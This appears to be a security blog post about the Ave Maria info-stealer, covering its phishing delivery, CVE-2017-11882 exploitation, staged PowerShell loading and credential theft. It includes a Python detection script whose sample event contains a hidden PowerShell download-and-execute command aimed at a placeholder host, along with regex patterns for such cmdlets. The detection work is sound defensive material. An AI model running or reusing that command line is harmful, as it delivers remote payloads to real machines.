
Ave Maria

Posted: May 7, 2019

Ave Maria is the name of a relatively new piece of malware that was first seen in action in January 2019, when it was used against Italian companies operating in the oil and gas sector. The attack was carried out with a phishing email that aimed to distribute malicious Microsoft Office files to company employees. The files in question would execute a script that exploits the CVE-2017-11882 vulnerability, which allows the remote attacker to download and launch an executable file on the compromised system.

But what is Ave Maria's purpose? This malware is meant to serve as an info stealer that can silently extract sensitive data from infected computers. It has the ability to collect saved Web browser passwords, and it even has the toolkit necessary to decrypt the password data that Mozilla Firefox stores. Malware researchers recently identified another attack campaign that involves Ave Maria. However, this time its authors have opted out of using an AutoIT script to deploy the payload and, instead, use a multi-stage attack technique that may help their malware avoid the detection methods used by some anti-virus software.

The recent Ave Maria attack is once again executed with phishing emails that carry a malicious file attachment. However, this time the Microsoft Office documents propagated by the attackers execute an obfuscated VBScript that triggers a series of PowerShell commands meant to initialize the first stage of the attack. The PowerShell script fetches data from a popular text storage site and then deobfuscates it to proceed with the next stages, which introduce Ave Maria, a Trojan downloader and a variant of RevengeRAT.
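The process chain described above (Office document, script host, PowerShell fetching a stage from a remote text site, plus the Equation Editor path used by CVE-2017-11882) is something a defender can hunt for in process-creation telemetry. The following is an added example, not code from the page or from any vendor: it runs a few simple parent/child and command-line rules over constructed Sysmon-style events, with `paste.example` as a placeholder for the unnamed text storage site and EQNEDT32.EXE being the Equation Editor binary that CVE-2017-11882 affects.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); sample data only.
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\user\AppData\Local\Temp\invoice.vbs"},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://paste.example/raw/abc123')\""},
    {"parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c stage1.exe"},
    {"parent": r"C:\Windows\explorer.exe",   # benign admin script, should not alert
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# Download-and-execute cmdlets/aliases commonly seen in first-stage PowerShell loaders.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b|net\.webclient",
    re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of all detection rules this event matches."""
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    hits = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")        # macro/VBScript stage
    if parent == "eqnedt32.exe":
        hits.append("equation_editor_child_process")    # CVE-2017-11882 exploitation pattern
    if image == "powershell.exe" and DOWNLOAD_RE.search(cmd) and URL_RE.search(cmd):
        hits.append("powershell_remote_fetch")          # stage pulled from a remote text site
    return hits

def scan(events):
    """(event index, rule name) pairs for every rule hit across the log."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]

if __name__ == "__main__":
    for idx, rule in scan(EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule alone is noisy in some environments; the value is in correlating them along one parent/child chain within a short time window.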

Once the Ave Maria info stealer is initialized, it may exploit a vulnerability in PkgMgr (a Windows component) that allows it to bypass User Account Control (UAC). This makes it possible for the attackers to fetch sensitive information without triggering UAC prompts and then transfer it to their server. The Ave Maria stealer looks for installed email clients it can collect information from, as well as passwords saved in Firefox.

Protecting a computer from the Ave Maria and similar threats can be done with the use of a sophisticated anti-malware utility.
